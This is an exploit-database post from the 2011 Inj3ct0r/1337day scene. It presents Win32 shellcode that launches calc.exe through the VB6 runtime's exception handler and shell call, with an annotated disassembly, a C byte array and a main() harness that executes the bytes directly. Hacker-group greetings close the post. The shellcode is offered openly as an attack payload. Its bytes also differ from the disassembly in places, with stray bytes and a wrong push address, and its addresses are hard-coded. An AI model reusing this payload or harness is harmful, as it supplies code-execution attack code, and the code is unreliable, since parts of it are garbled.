Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes



EKU-ID: 225 CVE: OSVDB-ID:
Author: KedAns-Dz Published: 2011-05-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# =========[ Sh31LC0d3.C ]=====>
/*
###
# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Win32
# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
# Tested on : Windows XP SP3 France
###
*/
// TesT Project   >> Compile As Name k3d4n5.exe <<
/*
004018E0   > 55      | PUSH EBP
004018E1   . 8BEC    | MOV EBP,ESP
004018E3   . 83EC 0C   | SUB ESP,0C
004018E6   . 68 96104000  | PUSH <JMP.&MSVBVM60.__vbaExceptHandler>  ;  SE handler installation (SEH)
004018EB   . 64:A1 00000000 | MOV EAX,DWORD PTR FS:[0]
004018F1   . 50          | PUSH EAX
004018F2   . 64:8925 00000000   | MOV DWORD PTR FS:[0],ESP
004018F9   . 83EC 30     | SUB ESP,30
004018FC   . 53          | PUSH EBX
004018FD   . 56          | PUSH ESI
004018FE   . 57          | PUSH EDI
004018FF   . 8965 F4     | MOV DWORD PTR SS:[EBP-C],ESP
00401902   . C745 F8 80104000   | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080
00401909   . 8B45 08      | MOV EAX,DWORD PTR SS:[EBP+8]
0040190C   . 8BC8         | MOV ECX,EAX
0040190E   . 83E1 01      | AND ECX,1
00401911   . 894D FC      | MOV DWORD PTR SS:[EBP-4],ECX
00401914   . 24 FE        | AND AL,0FE
00401916   . 50           | PUSH EAX
00401917   . 8945 08      | MOV DWORD PTR SS:[EBP+8],EAX
0040191A   . 8B10         | MOV EDX,DWORD PTR DS:[EAX]
0040191C   . FF52 04      | CALL DWORD PTR DS:[EDX+4]
0040191F   . 33F6         | XOR ESI,ESI
00401921   . 8D55 CC      | LEA EDX,DWORD PTR SS:[EBP-34]
00401924   . 8975 CC      | MOV DWORD PTR SS:[EBP-34],ESI
00401927   . 8D4D DC      | LEA ECX,DWORD PTR SS:[EBP-24]
0040192A   . 8975 DC      | MOV DWORD PTR SS:[EBP-24],ESI
0040192D   . C745 D4 616C632E657865   | MOV DWORD PTR SS:[EBP-2C], calc.exe
00401934   . C745 CC 08000000    | MOV DWORD PTR SS:[EBP-34],8
0040193B   . FF15 68104000       | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>]  ;  MSVBVM60.__vbaVarDup
00401941   . 8D45 DC    | LEA EAX,DWORD PTR SS:[EBP-24]
00401944   . 6A 02      | PUSH 2
00401946   . 50               | PUSH EAX
00401947   . FF15 34104000    | CALL DWORD PTR DS:[<&MSVBVM60.#600>]   ;  MSVBVM60.rtcShell
0040194D   . 8D4D DC          | LEA ECX,DWORD PTR SS:[EBP-24]
00401950   . DDD8       | FSTP ST
00401952   . FF15 08104000    | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>]  ;  MSVBVM60.__vbaFreeVar
00401958   . 8975 FC                  | MOV DWORD PTR SS:[EBP-4],ESI
0040195B   . 9B        | WAIT
0040195C   . 68 6E194000     | PUSH k3d4n5.0040196E
00401961   . EB 0A           | JMP SHORT k3d4n5.0040196D
00401963   . 8D4D DC         |  LEA ECX,DWORD PTR SS:[EBP-24]
00401966   . FF15 08104000   | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>]   ;  MSVBVM60.__vbaFreeVar
0040196C   . C3                        | RETN
*/
char SEH[] =
"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"
"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"
"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"
"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"
"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"
"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"
"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"
"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";

int main(int argc, char **argv)
{
int (*shellcode)();
shellcode = (int (*)()) SEH;
(int)(*shellcode)();
}
/*
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================================== 
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE *
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ ....
# Exploit-Id Team : jos_ali_joe + Caddy-Dz (exploit-id.com) ... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
#================================================================================================
*/